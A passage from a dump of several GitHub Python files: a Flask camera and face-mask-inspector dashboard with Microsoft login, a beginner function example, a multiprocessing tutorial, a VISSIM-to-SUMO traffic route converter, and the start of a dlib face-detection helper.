import Flask, flash, redirect, render_template, request, Response, session, url_for\n\n\napp = Flask(__name__)\napp.config.from_object(config)\nSession(app)\ndashboard.bind(app)\napp.wsgi_app = ProxyFix(app.wsgi_app, x_proto=1, x_host=1)\ncameras_collection = config.db['cameras']\nsecurity_collection = config.db['security']\nfiles_collection = config.db['fs.files']\nchunks_collection = config.db['fs.chunks']\nsettings_collection = config.db['settings']\n\n\ndef login_required(f):\n @functools.wraps(f)\n def decorated_function(*args, **kwargs):\n if not session.get(\"user\"):\n return redirect(url_for('login', next=request.url))\n return f(*args, **kwargs)\n return decorated_function\n\n\ndef generate(camera):\n while True:\n frame = camera.get_frame()\n if frame is not None:\n yield (b'--frame\\r\\n'\n b'Content-Type: image/jpeg\\r\\n\\r\\n' +\n frame + b'\\r\\n\\r\\n'\n )\n\n\ndef _load_cache():\n cache = msal.SerializableTokenCache()\n if session.get(\"token_cache\"):\n cache.deserialize(session[\"token_cache\"])\n return cache\n\n\ndef _save_cache(cache):\n if cache.has_state_changed:\n session[\"token_cache\"] = cache.serialize()\n\n\ndef _build_msal_app(cache=None, authority=None):\n return msal.ConfidentialClientApplication(\n config.CLIENT_ID,\n authority=authority or config.AUTHORITY,\n client_credential=config.CLIENT_SECRET,\n token_cache=cache\n )\n\n\ndef _build_auth_url(authority=None, scopes=None, state=None):\n return _build_msal_app(authority=authority).get_authorization_request_url(\n scopes or [],\n state=state or str(uuid.uuid4()),\n redirect_uri=url_for(\"authorized\", _external=True)\n )\n\n\ndef _get_token_from_cache(scope=None):\n # This web app maintains one cache per session\n cache = _load_cache()\n cca = _build_msal_app(cache=cache)\n accounts = cca.get_accounts()\n # So all account(s) belong to the current signed-in user\n if accounts:\n 
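# acquire_token_silent() answers from the per-session cache, transparently\n        # redeeming the refresh token when the access token has expired; it\n        # returns None when only an interactive sign-in can produce a token\n        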
result = cca.acquire_token_silent(scope, account=accounts[0])\n        _save_cache(cache)\n        return result\n\n\n@app.route(\"/\", methods=['GET'])\n@login_required\ndef index():\n    cameras = list(cameras_collection.find({}))\n    security = list(security_collection.find({}))\n    images = list(files_collection.find({}))\n    settings = list(settings_collection.find({}))\n    return render_template('pages/home.html',\n                           cameras=cameras,\n                           security=security,\n                           images=images,\n                           settings=settings\n                           )\n\n\n@app.route(\"/create/camera\", methods=['POST'])\n@login_required\ndef create_camera():\n    _id = uuid.uuid4() \n    data = request.form.copy()\n    try:\n        if len(list(security_collection.find({}))) < 1:\n            raise Exception\n        cameras_collection.insert_one({\n            \"_id\": _id,\n            \"location\": data.get('location'),\n            \"url\": data.get('url'),\n            \"status\": data.get('status'),\n            \"supervisor_id\": data.get('supervisor_id')\n        })\n        flash(\n            f\"success|Camera at {data.get('location')} has been successfully added.\")\n    except:\n        flash(f\"danger|Camera couldn't be added\")\n    finally:\n        return redirect(url_for(\"index\"))\n\n\n@app.route(\"/create/security\", methods=['POST'])\n@login_required\ndef create_security():\n    _id = uuid.uuid4()\n    data = request.form.copy()\n    try:\n        security_collection.insert_one({\n            \"_id\": _id,\n            \"first_name\": data.get('first_name'),\n            \"last_name\": data.get('last_name'),\n            \"email\": data.get('email'),\n            \"phone\": data.get('phone')\n        })\n        flash(\n            f\"success|Security member {data.get('first_name')} {data.get('last_name')} has been successfully added.\")\n    except:\n        flash(f\"danger|Security member couldn't be added\")\n    finally:\n        return redirect(url_for(\"index\"))\n\n\n@app.route(\"/edit/camera/<id>\", methods=['POST'])\n@login_required\ndef edit_camera(id):\n    data = request.form.copy()\n    # In case we want to use webcam\n    # url = int(data.get('url')) if data.get('url') == '0' or data.get('url') == '1' else data.get('url')\n    try:\n        cameras_collection.update_one({\"_id\": id}, {\"$set\": {\n            \"location\": data.get('location'),\n            \"url\": data.get('url'),\n            \"status\": data.get('status'),\n            \"supervisor_id\": data.get('supervisor_id')\n        }})\n        flash(\"success|Camera has been successfully updated.\")\n    except:\n        flash(\"danger|Camera couldn't be updated\")\n    finally:\n        return redirect(url_for(\"index\"))\n\n\n@app.route(\"/edit/security/<id>\", methods=['POST'])\n@login_required\ndef edit_security(id):\n    data = request.form.copy()\n    try:\n        security_collection.update_one({\"_id\": id}, {\"$set\": {\n            \"first_name\": data.get('first_name'),\n            \"last_name\": data.get('last_name'),\n            \"email\": data.get('email'),\n            \"phone\": data.get('phone')\n        }})\n        flash(f\"success|Security member has been successfully updated.\")\n    except:\n        flash(f\"danger|Security member couldn't be updated\")\n    finally:\n        return redirect(url_for(\"index\"))\n\n\n@app.route(\"/delete/camera/<id>\", methods=['POST'])\n@login_required\ndef delete_camera(id):\n    try:\n        cameras_collection.delete_one({\"_id\": id})\n        flash(f\"success|Camera has been successfully deleted.\")\n    except:\n        flash(f\"danger|Camera couldn't be deleted\")\n    finally:\n        return redirect(url_for(\"index\"))\n\n\n@app.route(\"/delete/security/<id>\", methods=['POST'])\n@login_required\ndef delete_security(id):\n    try:\n        cameras_collection.update_many(\n            {'supervisor_id': str(id)},\n            {'$set': {\n                'supervisor_id': -1\n            }})\n        security_collection.delete_one({\"_id\": id})\n        flash(f\"success|Security member has been successfully deleted.\")\n    except:\n        flash(f\"danger|Security member couldn't be 
deleted\")\n    finally:\n        return redirect(url_for(\"index\"))\n\n\n@app.route(\"/settings/edit\", methods=['POST'])\n@login_required\ndef change_settings():\n    data = request.form.copy()\n    settings_collection.update_one({\"id\": 0}, {\n        \"$set\": {\n            \"confidence\": float(data['confidence']),\n            \"lock_duration\": int(data['lock_duration'])\n        }\n    })\n    flash(\"success|Settings have been updated successfully.\")\n    return redirect(url_for('index'))\n\n\n@app.route('/video/feed/<id>')\n@login_required\ndef video_feed(id):\n    try:\n        return Response(generate(Camera(id)),\n                        mimetype='multipart/x-mixed-replace; boundary=frame'\n                        )\n    except:\n        flash(\"danger|There is no camera with this id\")\n        return redirect(url_for('index'))\n\n\n@app.route('/images/<files_id>')\n@login_required\ndef get_image(files_id):\n    chunks = chunks_collection.find_one({\"files_id\": ObjectId(files_id)})\n    return Response((b'--frame\\r\\n'\n                     b'Content-Type: image/jpeg\\r\\n\\r\\n' +\n                     chunks['data'] + b'\\r\\n\\r\\n'\n                     ),\n                    mimetype='multipart/x-mixed-replace; boundary=frame'\n                    )\n\n\n@app.route(\"/login\")\ndef login():\n    session[\"state\"] = str(uuid.uuid4())\n    # Technically we could use empty list [] as scopes to do just sign in,\n    # here we choose to also collect end user consent upfront\n    auth_url = _build_auth_url(\n        scopes=config.SCOPE, state=session[\"state\"]\n    )\n    return render_template(\"pages/welcome.html\", auth_url=auth_url)\n\n\n@app.route(\"/logout\")\ndef logout():\n    # Wipe out user and its token cache from session\n    session.clear()\n    # Also logout from your tenant's web session\n    return redirect(config.AUTHORITY +\n                    \"/oauth2/v2.0/logout\" +\n                    \"?post_logout_redirect_uri=\" +\n                    url_for(\"index\", _external=True)\n                    )\n\n\n@app.route(config.REDIRECT_PATH)\ndef authorized():\n    if request.args.get('state') != session.get(\"state\"):\n        # No-OP. 
Goes back to Index page\n return redirect(url_for(\"index\"))\n # Authentication/Authorization failure\n if \"error\" in request.args:\n return render_template(\"auth_error.html\", result=request.args)\n if request.args.get('code'):\n cache = _load_cache()\n result = _build_msal_app(cache=cache).acquire_token_by_authorization_code(\n request.args['code'],\n # Misspelled scope would cause an HTTP 400 error here\n scopes=config.SCOPE,\n redirect_uri=url_for(\"authorized\", _external=True)\n )\n if \"error\" in result:\n return render_template(\"auth_error.html\", result=result)\n session[\"user\"] = result.get(\"id_token_claims\")\n _save_cache(cache)\n return redirect(url_for(\"index\"))\n\n\nif __name__ == \"__main__\":\n # Run the server\n app.run(host='0.0.0.0', threaded=True)\n","repo_name":"othmanKisha/In-Door-Face-Mask-Inspector","sub_path":"app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":9572,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"6"} +{"seq_id":"23852231565","text":"# Testing multiple return valued function\n\ndef get_fullname():\n first = input(\"Enter your first name: \")\n last = input(\"Enter your second name: \")\n return first, last\n\nfirstNm,lastNm = get_fullname()\nprint(\"First name: \" + firstNm)\nprint(\"Last name: \" + lastNm)\n","repo_name":"Chelton-dev/ICTPRG-Python","sub_path":"func13multiple.py","file_name":"func13multiple.py","file_ext":"py","file_size_in_byte":271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"14008440187","text":"# we will recap how we can create and start multiple processes.\n# then we will learn how we can share data between processes, \n# we will recap how to use locks to prevent race and how to use queues\n# we will learn how to use a process pool to easily manage multiple processes.\n\n\n# This is the how to setup multiprocessing\nfrom multiprocessing import Process\nimport os\nimport time\n\n\ndef square_numbers():\n for i in range(100):\n i * i\n time.sleep(1)\n\n\nif __name__ == \"__main__\":\n\n processes = []\n num_processes = os.cpu_count()\n # number of CPUs on the machine, Usually a good choice for the number of processes\n \n\n # create processes and assign a function for each process\n for i in range(num_processes):\n p = Process(target=square_numbers) \n # if target has args Process(target=square_numbers, args=())\n processes.append(p)\n\n # start all processes\n for p in processes:\n p.start()\n\n # wait for all processes to finish\n # block the main program until these processes are finished\n for p in processes:\n p.join()\n\n\n print('end main')","repo_name":"JeffreyAsuncion/Python_Intermediate_FCC","sub_path":"17_Multiprocessing/multi.py","file_name":"multi.py","file_ext":"py","file_size_in_byte":1117,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"8384228531","text":"from __future__ import absolute_import\nfrom __future__ import print_function\n\nimport argparse\nfrom xml.dom import minidom\nimport numpy as np\nfrom xml.dom.minidom import Document\n\n\ndef _dict_from_node_attributes(node):\n \"\"\"takes xml node and returns a dict with its attributes\n \"\"\"\n return dict((attn, node.getAttribute(attn)) for attn in\n node.attributes.keys())\n\n\n# FUNKTIONEN\ndef parse_flows(xmldoc):\n \"\"\"parses the vehicleInput flows from the VISSIM data\n :param xmldoc: input VISSIM xml\n :type xmldoc: xml.dom.minidom.Document\n :return: 
flow data by VISSIM start link id\n :rtype: dict\n\n .. note:: time frames are converted from [ms] -> [s]\n .. todo:: remove the redundant col2 in ['flow']\n \"\"\"\n flw_d = dict() # local flows dict\n for v_input in xmldoc.getElementsByTagName('vehicleInput'):\n v_input_d = _dict_from_node_attributes(v_input)\n v_input_d[\"vehComp\"] = []\n v_input_d[\"volType\"] = []\n v_input_d[\"flow\"] = []\n for volume in v_input.getElementsByTagName('timeIntervalVehVolume'):\n v_input_d[\"vehComp\"].append(volume.getAttribute('vehComp'))\n v_input_d[\"volType\"].append(volume.getAttribute('volType'))\n # keeping (timeInterval, volume, vehicle composition)\n # time interval converted to [s]\n v_input_d[\"flow\"].append(\n [float(volume.getAttribute('timeInt').split(\" \")[1]) / 1000,\n float(volume.getAttribute('volume')),\n float(volume.getAttribute('vehComp'))]) # FIXME: nasty, redundant\n v_input_d[\"flow\"] = np.array(v_input_d[\"flow\"])\n # here goes a VISSIM linkId as key (& value)\n flw_d[v_input_d[\"link\"]] = v_input_d\n return flw_d\n\n\ndef parse_max_acc(xmldoc):\n \"\"\"parses the vehicle acceleration distributions from the VISSIM data\n :param xmldoc: input VISSIM xml\n :type xmldoc: xml.dom.minidom.Document\n :return: map of 1st acceleration function data point value by str(numeric id)\n :rtype: dict\n \"\"\"\n acc_d = dict()\n for max_acc in xmldoc.getElementsByTagName('maxAccelerationFunction'):\n acc_d[max_acc.getAttribute('no')] = max_acc.getElementsByTagName(\n 'accelerationFunctionDataPoint')[0].getAttribute('y')\n return acc_d\n\n\ndef parse_speed_avg(xmldoc):\n \"\"\"parses the vehicle speed distribution from the VISSIM data\n :param xmldoc: input VISSIM xml\n :type xmldoc: xml.dom.minidom.Document\n :return: map of some speed averages by str(numeric id)\n :rtype: dict\n\n .. 
note:: the average is only approximated\n \"\"\"\n spd_d = dict() # local speeds dict\n for deSpeeDis in xmldoc.getElementsByTagName('desSpeedDistribution'):\n # get mean speed\n num = 0.\n sum_val = 0.\n data_points = deSpeeDis.getElementsByTagName('speedDistributionDataPoint')\n for point in data_points:\n num += 1\n sum_val += float(point.getAttribute('x'))\n spd_d[deSpeeDis.getAttribute('no')] = str((sum_val / num) / 3.6)\n return spd_d\n\n\ndef parse_length(xmldoc):\n \"\"\"parses the vehicle type lengths from the VISSIM data\n :param xmldoc: input VISSIM xml\n :type xmldoc: xml.dom.minidom.Document\n :return: map of lengths by str(numeric type)\n :rtype: dict\n \"\"\"\n len_d = dict()\n model_d = dict()\n # get model data\n for model in xmldoc.getElementsByTagName('model2D3D'):\n model_d[model.getAttribute('no')] = model.getElementsByTagName(\n 'model2D3DSegment')[0].getAttribute('length')\n # calculate length data\n for model_dist in xmldoc.getElementsByTagName('model2D3DDistribution'):\n elements = model_dist.getElementsByTagName(\n 'model2D3DDistributionElement')\n length = 0\n total_probability = 0\n for element in elements:\n total_probability += float(element.getAttribute('share'))\n for element in elements:\n length += (\n float(element.getAttribute('share')) / total_probability) * \\\n float(model_d[element.getAttribute('model2D3D')])\n len_d[model_dist.getAttribute('no')] = str(length)\n return len_d\n\n\ndef parse_veh_comp(xmldoc):\n \"\"\"parses the vehicle composition from the VISSIM data\n :param xmldoc: input VISSIM xml\n :type xmldoc: xml.dom.minidom.Document\n :return: relevant VISSIM vehicleComposition data\n :rtype: dict of list of dict\n \"\"\"\n veh_cmp_d = dict() # local vehicle compositions' dict\n for vehicle_comp in xmldoc.getElementsByTagName('vehicleComposition'):\n rel_flows = vehicle_comp.getElementsByTagName(\n 'vehicleCompositionRelativeFlow')\n flow_l = []\n for flow in rel_flows:\n flw_d = {\n 'desSpeedDistr': flow.getAttribute('desSpeedDistr'),\n 'rel_flow': flow.getAttribute('relFlow'),\n 'vehType': flow.getAttribute('vehType'),\n }\n flow_l.append(flw_d)\n # list of dictionaries\n veh_cmp_d[vehicle_comp.getAttribute('no')] = flow_l\n return veh_cmp_d\n\n\ndef parse_vehicle_types(xmldoc, acc_d, length_d):\n \"\"\"parses the vehicle types from the VISSIM data\n :param xmldoc: input VISSIM xml\n :type xmldoc: xml.dom.minidom.Document\n :return: relevant VISSIM vehicle type data\n :rtype: dict of dict\n \"\"\"\n veh_type_d = dict()\n for veh_type in xmldoc.getElementsByTagName('vehicleType'):\n type_d = {\n 'id': veh_type.getAttribute('no'),\n 'length': length_d[veh_type.getAttribute('model2D3DDistr')],\n 'acc': acc_d[veh_type.getAttribute('maxAccelFunc')],\n }\n veh_type_d[veh_type.getAttribute('no')] = type_d\n return veh_type_d\n\n\n# FIXME: not necessarily nicely done\ndef gen_verbinder_map(xmldoc):\n \"\"\"produce dict with boolean values to check if a given link is a verbinder\n :param xmldoc: input VISSIM xml\n :type xmldoc: xml.dom.minidom.Document\n :return: map of VISSIM link id -> bool flag if link is 'Verbinder'\n :rtype: dict\n \"\"\"\n # simple implementation by static variable; xmldoc arg is in the way\n # if not hasattr(gen_verbinder_map, \"v_dic\"):\n # gen_verbinder_map.v_dic = dict() # doesn't exist yet, so initialize\n is_verbinder_d = dict()\n for link in xmldoc.getElementsByTagName(\"link\"):\n if len(link.getElementsByTagName(\"fromLinkEndPt\")) > 0:\n is_verbinder_d[link.getAttribute(\"no\")] = True\n else:\n 
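# links without a fromLinkEndPt child are ordinary links; only VISSIM\n            # connectors ('Verbinder') carry that element\n            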
is_verbinder_d[link.getAttribute(\"no\")] = False\n # returning a dict...\n return is_verbinder_d\n\n\ndef parse_routes(xmldoc, edge_id_list, verbinder_d):\n \"\"\"parses the VISSIM route information of statically defined routes ONLY\n :param xmldoc: input VISSIM xml\n :type xmldoc: xml.dom.minidom.Document\n :param edge_id_list: the name says it all; SUMO edge ids\n :param verbinder_d: bool(verbinder status) of VISSIM link id\n :type verbinder_d: dict\n :return: routes by VISSIM start link id, with respective destination routes\n :rtype: dict\n\n .. note:: time frames are converted from [ms] -> [s]\n .. todo:: extend for non-static routes\n \"\"\"\n # create a list of just the split vissim edges (marked by ending char ']')\n split_edge_list = [e for e in edge_id_list if e[-1] == ']']\n rts_by_start_d = dict() # dictionary[start_link] = list()\n # loop over all routing decisions\n for decision in xmldoc.getElementsByTagName('vehicleRoutingDecisionStatic'):\n start_link = decision.getAttribute('link')\n rts_by_start_d[start_link] = []\n for vehRtStatic in decision.getElementsByTagName('vehicleRouteStatic'):\n route_d = {\n \"start_link\": start_link, # VISSIM id\n \"dest_link\": vehRtStatic.getAttribute('destLink'), # VISSIM id\n \"r_id\": vehRtStatic.getAttribute('no'),\n \"rel_flow\": [],\n \"links\": [start_link, ] # finally translated to SUMO ids\n }\n # split into separate time intervals' relative flow data\n for tIrFlow in map(str.strip, str(vehRtStatic.getAttribute('relFlow')).split(',')):\n if len(tIrFlow) == 0:\n continue\n temp = tIrFlow.split() # get \"id\", \"tInterval:relFlow\"\n try:\n tIrFlow = map(float, temp[1].split(':')) # grab [tInterval, relFlow]\n except TypeError:\n print('- WARNING - incomplete relative flow definition in inpx\\n',\n decision.toxml())\n route_d[\"rel_flow\"].append(list(tIrFlow))\n tIrFlow = np.array(route_d[\"rel_flow\"])\n if len(tIrFlow) > 0:\n tIrFlow[:, 0] /= 1000 # VISSIM time intervals [ms]->[s]\n route_d[\"rel_flow\"] = tIrFlow\n else:\n # create something.. 
0 rows, 2 cols\n # NOTE: better None, but takes some adaption work\n route_d[\"rel_flow\"] = np.empty((0, 2), dtype=\"f\")\n\n # get all the intermediary links in their sumo representation\n for link in vehRtStatic.getElementsByTagName('intObjectRef'):\n link_key = link.getAttribute('key')\n if verbinder_d[link_key]:\n # exclude VISSIM connectors (usually id > 10k)\n continue\n # collect them all in VISSIM scheme first, then replace them\n route_d[\"links\"].append(link_key)\n route_d[\"links\"].append(route_d[\"dest_link\"])\n\n # translate to sumo edge ids\n sumo_links = []\n for link_key in route_d[\"links\"]:\n if link_key in edge_id_list:\n # key is found unmodified in edge_id_list\n sumo_links.append(link_key)\n else:\n # extension list *IS* ordered by its splitting sequence as generated\n sumo_links.extend(e for e in split_edge_list\n if e.startswith(link_key + '['))\n # update with sumo ids info\n route_d[\"links\"] = sumo_links\n\n # add route object to dictionary\n rts_by_start_d[start_link].append(route_d)\n return rts_by_start_d\n\n\ndef calc_route_probability(routes_by_start_d, flow_d):\n \"\"\"computes the route probabilies\n :param routes_by_start_d: map by start link id with route dicts as values\n :type routes_by_start_d: dict\n :param flow_d: vissim vehicle in-flow data\n :type flow_d: dict\n \"\"\"\n for start_link, sl_routes in routes_by_start_d.items():\n if start_link not in flow_d:\n # we got no in-flow data for that route's start link\n print('- skipping probability calc\\n',\n '\\tfor route without flow def. for VISSIM start link id:', start_link)\n continue\n # set 0 vectors for all time frames\n absolute_flow = flow_d[start_link][\"flow\"][:, 1]\n veh_comp = flow_d[start_link][\"vehComp\"]\n # time frames must have the same limits as flows, as checked before\n # therefor all route flows for 1 start link must also have same limits\n # get all the startlink-route rel.flows-by-time-window lined up\n sl_rt_relF = np.stack([rt['rel_flow'] for rt in sl_routes])\n # all summed rel.flows by timeframe\n # sl_sum_relF = sl_rt_relF.sum(axis=0)[:, 1:] # keep shape (n x timeframes)\n sl_sum_relF = sl_rt_relF.sum(axis=0)[:, 1] # shape (timeframes, )\n for route in routes_by_start_d[start_link]:\n # set the vehicle type for each route\n route[\"type\"] = veh_comp\n route[\"probability\"] = np.zeros_like(absolute_flow)\n # get a selector for all summed up flows > 0 (= relevant)\n comp_flow_sel = sl_sum_relF > 0.\n route[\"probability\"][comp_flow_sel] = \\\n (route[\"rel_flow\"][comp_flow_sel, 1] / sl_sum_relF[comp_flow_sel])\n\n\ndef validate_rel_flow(routes_by_start_d, flow_d):\n \"\"\"checks if a relative flow is missing and completes it if necessary\n essentially fixing a VISSIM inp -> inpx conversion bug\n :param routes_by_start_d: map by start link id with route dicts as values\n :type routes_by_start_d: dict\n :param flow_d: vissim vehicle in-flow data\n :type flow_d: dict\n\n .. note:: *modifies* routes_by_start_d\n \"\"\"\n # VISSIM BUG!!: Relative Zuflüsse mit dem Wert 1.0 gehen bei der\n # Konversion von .inp zu .inpx verloren\n\n # compare all rel_flows with the reference flow\n # get all time frame limits from all routes\n # np.concatenate([rt['rel_flow'] for rtl in routes_by_start_d.values() for rt in rtl])\n for start_link, sl_routes in routes_by_start_d.items():\n if start_link not in flow_d:\n # should we remove the routes entry ?\n print('- skipping flow validation\\n'\n '\\tfor route without flow def. 
for VISSIM start link id:', start_link)\n # CHECK: is this ok with later steps ?\n continue\n # grab all the time window starts from the flows\n # NOTE: need slice here due to redundant veh_comp col.\n ref_time_shape = flow_d.get(start_link)[\"flow\"][:, :2]\n ref_time_shape[:, 1] = 1. # set to default (VISSIM inp-> inpx BUG)\n for route in sl_routes:\n # check if there is a relative flow def. at all\n if len(route[\"rel_flow\"]) == 0:\n # if not, append default\n route[\"rel_flow\"] = ref_time_shape.copy()\n continue\n else:\n # check if the time frame starts are the same\n assert np.array_equal(ref_time_shape[:, 0], route[\"rel_flow\"][:, 0]),\\\n \"\\nPROBLEM: flow count and relative flow time frames are not aligned\\n\\t\"\\\n \"for VISSIM start link id: \" + start_link\n # copy back modifications\n routes_by_start_d[start_link] = sl_routes\n\n\ndef create_vTypeDistribution_elems(veh_comp_d, veh_type_d, speed_d, root):\n \"\"\"append the vehicle distribution data to the given dom document\n :param veh_comp_d:\n :type veh_comp_d: dict\n :param veh_type_d:\n :type veh_type_d: dict\n :param speed_d:\n :type speed_d: dict\n :param root: XML root element to append children to\n\n .. note:: *modifies/extends* XML root element\n \"\"\"\n # iterate vehicle compositions\n for c_id, comps in veh_comp_d.items():\n v_type_dist = root.ownerDocument.createElement(\"vTypeDistribution\")\n v_type_dist.setAttribute(\"id\", c_id)\n root.appendChild(v_type_dist)\n for comp in comps:\n v_type = root.ownerDocument.createElement(\"vType\")\n v_type.setAttribute(\n \"id\",\n \"t{}_D{}\".format(\n veh_type_d[comp[\"vehType\"]][\"id\"],\n c_id))\n v_type.setAttribute(\"accel\", veh_type_d[comp[\"vehType\"]][\"acc\"])\n v_type.setAttribute(\"length\",\n veh_type_d[comp[\"vehType\"]][\"length\"])\n v_type.setAttribute(\"probability\", comp[\"rel_flow\"])\n v_type.setAttribute(\"maxSpeed\", speed_d[comp[\"desSpeedDistr\"]])\n v_type_dist.appendChild(v_type)\n # return route_doc\n\n\ndef create_routeDistribution_elems(routes_by_start_d, root):\n \"\"\"append the route distribution data into the given dom document\n :param routes_by_start_d: map by start link id with route dicts as values\n :type routes_by_start_d: dict\n :param root: XML root element to append children to\n\n .. note:: *modifies/extends* XML root element\n \"\"\"\n # iterating by VISSIM link id\n for start_link in routes_by_start_d:\n if start_link not in flow_d:\n # no flow, no go\n print('- skipping route dist. gen\\n'\n '\\tfor route without flow def. 
for VISSIM start link id:', start_link)\n continue\n if len(routes_by_start_d[start_link]) == 0:\n continue\n ref_time = flow_d[start_link][\"flow\"][:, 0]\n for ic, time in enumerate(ref_time):\n route_dist = root.ownerDocument.createElement(\"routeDistribution\")\n # just a name\n route_dist.setAttribute(\"id\", \"_\".join([start_link,\n str(time)]))\n for route in routes_by_start_d[start_link]:\n if np.abs(route[\"probability\"][ic]) != 0:\n route_node = root.ownerDocument.createElement(\"route\")\n route_node.setAttribute(\"id\", route[\"r_id\"])\n route_node.setAttribute(\"edges\",\n \" \".join(route[\"links\"]))\n route_node.setAttribute(\"probability\",\n str(np.abs(\n route[\"probability\"][ic])))\n route_dist.appendChild(route_node)\n if route_dist.hasChildNodes():\n root.appendChild(route_dist)\n # return route_doc\n\n\ndef create_flow_elems(routes_by_start_d, flow_d, root):\n \"\"\"append the flow data to the given dom document\n :param routes_by_start_d: map by start link id with route dicts as values\n :type routes_by_start_d: dict\n :param flow_d: vissim vehicle in-flow data\n :type flow_d: dict\n :param root: XML root element to append children to\n\n .. note:: *modifies/extends* XML root element\n \"\"\"\n sim_end = inpx_doc.getElementsByTagName(\"simulation\")[0].getAttribute(\"simPeriod\")\n dom_flow_l = []\n for start_link in routes_by_start_d:\n if start_link not in flow_d:\n # we got no in-flow data for that route's start link\n print('- skipping flow gen\\n'\n '\\tfor route without flow def. for VISSIM start link id:', start_link)\n continue\n if len(routes_by_start_d[start_link]) == 0:\n print('- found no routes by start link:', start_link)\n continue\n flows = flow_d[start_link][\"flow\"]\n # iterate over all the time frame starts from the flows\n ref_time = flows[:, 0]\n for index, time in enumerate(ref_time):\n in_flow = [fl for fl in flow_d[start_link][\"flow\"] if\n fl[0] == time][0]\n if in_flow[1] > 0:\n flow = root.ownerDocument.createElement(\"flow\")\n flow.setAttribute(\"id\", \"fl{}_st{}\".format(start_link,\n time))\n flow.setAttribute(\"color\", \"1,1,0\")\n flow.setAttribute(\"begin\", str(time))\n if index < len(ref_time) - 1 and len(ref_time) > 1:\n flow.setAttribute(\"end\",\n str(time + ref_time[index + 1]))\n else:\n flow.setAttribute(\"end\", sim_end)\n flow.setAttribute(\"vehsPerHour\", str(in_flow[1]))\n flow.setAttribute(\"type\", str(int(in_flow[2])))\n flow.setAttribute('route', \"_\".join([start_link,\n str(time)]))\n dom_flow_l.append(flow)\n dom_flow_l = sorted(dom_flow_l,\n key=lambda dom: float(dom.getAttribute(\"begin\")))\n for dom_obj in dom_flow_l:\n root.appendChild(dom_obj)\n # return route_doc\n\n\n# MAIN\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description='road network conversion utility for static route flows'\n ' (VISSIM.inpx to SUMO); generates SUMO routes definition file from'\n ' given inpx and derived (by netconvert) SUMO net.')\n parser.add_argument('--output-file', '-o', default='routes.rou.xml',\n help='output file name (default: %(default)s)')\n parser.add_argument('--vissim-file', '-V', dest=\"vissim_file\", required=True,\n help='VISSIM inpx file path')\n parser.add_argument('--sumo-net-file', '-n', dest=\"sumo_net_file\", required=True,\n help='SUMO net file path')\n args = parser.parse_args()\n # print(\"\\n\", args, \"\\n\")\n\n #\n # Input data ##########\n #\n print('\\n---\\n\\n* loading VISSIM net:\\n\\t', args.vissim_file)\n inpx_doc = minidom.parse(args.vissim_file)\n 
print('\\n---\\n\\n* loading SUMO net:\\n\\t', args.sumo_net_file,)\n sumo_doc = minidom.parse(args.sumo_net_file)\n\n print('+ building edge list...')\n # for all normal edges\n sumo_edge_ids = [edge.getAttribute(\"id\") for edge in\n sumo_doc.getElementsByTagName('edge')\n if not edge.hasAttribute(\"function\")]\n print('\\tOK.')\n\n print('+ building \"Verbinder\"(\"connector\") info...')\n # to check if a link is a verbinder\n verbinder_flag = gen_verbinder_map(inpx_doc)\n print('\\tOK.')\n\n print('\\n---')\n #\n # Vehicle Speeds, distributions, types ##########\n #\n print('* parsing speeds...')\n # parse vehicle type data\n speed_d = parse_speed_avg(inpx_doc)\n print('* parsing vehicle distributions...')\n # get the vehicle distribution\n vehicle_comp_d = parse_veh_comp(inpx_doc)\n print('* parsing vehicle types...')\n # parse vehTypes and combine the information with acceleration and length data\n vehicle_type_d = parse_vehicle_types(inpx_doc, parse_max_acc(inpx_doc),\n parse_length(inpx_doc))\n print('OK.\\n---')\n\n #\n # Flows and Routes ##########\n #\n # TODO: maybe make flows and routes conversion switchable by option ?\n print('* parsing vehicle in-flow definitions...')\n # parse flows\n flow_d = parse_flows(inpx_doc)\n print('* parsing vehicle routes...')\n # parse routes\n routes_by_start_d = parse_routes(inpx_doc, sumo_edge_ids, verbinder_flag)\n print('+ validating relative flows...')\n # validate relative flows\n validate_rel_flow(routes_by_start_d, flow_d)\n print('+ setting route branching probabilities...')\n # computes the probability for each route\n calc_route_probability(routes_by_start_d, flow_d)\n print('OK.\\n---')\n\n #\n # XML generation ##########\n #\n print('* output routes generation...')\n # create dom document and define routes + flows\n result_doc = Document()\n routes_Elem = result_doc.createElement(\"routes\")\n result_doc.appendChild(routes_Elem)\n\n create_vTypeDistribution_elems(vehicle_comp_d, vehicle_type_d, speed_d, routes_Elem)\n print('-' * 3)\n create_routeDistribution_elems(routes_by_start_d, routes_Elem)\n print('-' * 3)\n create_flow_elems(routes_by_start_d, flow_d, routes_Elem)\n print('OK.\\n---')\n\n print('* wrinting output:')\n # write the data into a .rou.xml file\n out_Fn = args.output_file\n if not out_Fn.endswith('.xml'):\n out_Fn += '.xml'\n with open(out_Fn, \"w\") as ofh:\n result_doc.writexml(ofh, addindent=' ', newl='\\n')\n ofh.close()\n print('. 
data written to:\\n\\t', out_Fn)\n","repo_name":"ngctnnnn/DRL_Traffic-Signal-Control","sub_path":"sumo-rl/sumo/tools/import/vissim/convert_vissimXML_flows_statRoutes.py","file_name":"convert_vissimXML_flows_statRoutes.py","file_ext":"py","file_size_in_byte":23322,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"6"} +{"seq_id":"24520252595","text":"import logging\n\nimport cv2\nimport dlib\nimport numpy as np\nfrom PIL import Image\n\nfrom src.factory import setup_model\n\n# for face detection\ndetector = dlib.get_frontal_face_detector()\n\n# load model and weights\nmodel, img_size = setup_model()\n\n\ndef draw_label(image, point, label, font=cv2.FONT_HERSHEY_SIMPLEX, font_scale=0.8, thickness=1):\n size = cv2.getTextSize(label, font, font_scale, thickness)[0]\n x, y = point\n cv2.rectangle(image, (x, y - size[1]), (x + size[0], y), (255, 0, 0), cv2.FILLED)\n cv2.putText(\n image, label, point, font, font_scale, (255, 255, 255), thickness, lineType=cv2.LINE_AA\n )\n\n\ndef convert_pil_2_cv2(img: Image.Image) -> np.array:\n return cv2.cvtColor(np.array(img), cv2.COLOR_RGB2BGR)\n\n\ndef convert_cv2_2_pil(img: np.array) -> Image.Image:\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n return Image.fromarray(img)\n\n\ndef resize_image(img: np.array) -> np.array:\n h, w, _ = img.shape\n r = 640 / max(w, h)\n return cv2.resize(img, (int(w * r), 